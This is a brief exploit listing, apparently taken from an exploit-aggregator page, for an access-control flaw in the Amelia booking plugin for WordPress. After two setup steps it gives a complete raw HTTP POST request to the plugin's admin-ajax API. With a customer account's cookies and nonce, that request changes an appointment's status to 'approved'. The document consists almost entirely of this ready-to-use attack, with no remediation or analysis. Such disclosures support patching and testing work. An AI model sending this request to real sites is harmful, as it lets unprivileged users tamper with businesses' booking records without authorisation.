Share
## https://sploitus.com/exploit?id=WPEX-ID:1A92A65F-E9DF-41B5-9A1C-8E24EE9BF50E
1. Make a booking to become customer
2. Login to WordPress with the customer account and make the following request (the ameliaNonce can be retrieved via "wpAmeliaNonce" under the Amelia dashboard)

POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments/status/2&ameliaNonce=e9ff5220c4 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 711
Connection: close
Cookie: [customer+ cookies]

{"status": "approved","packageCustomerId": null}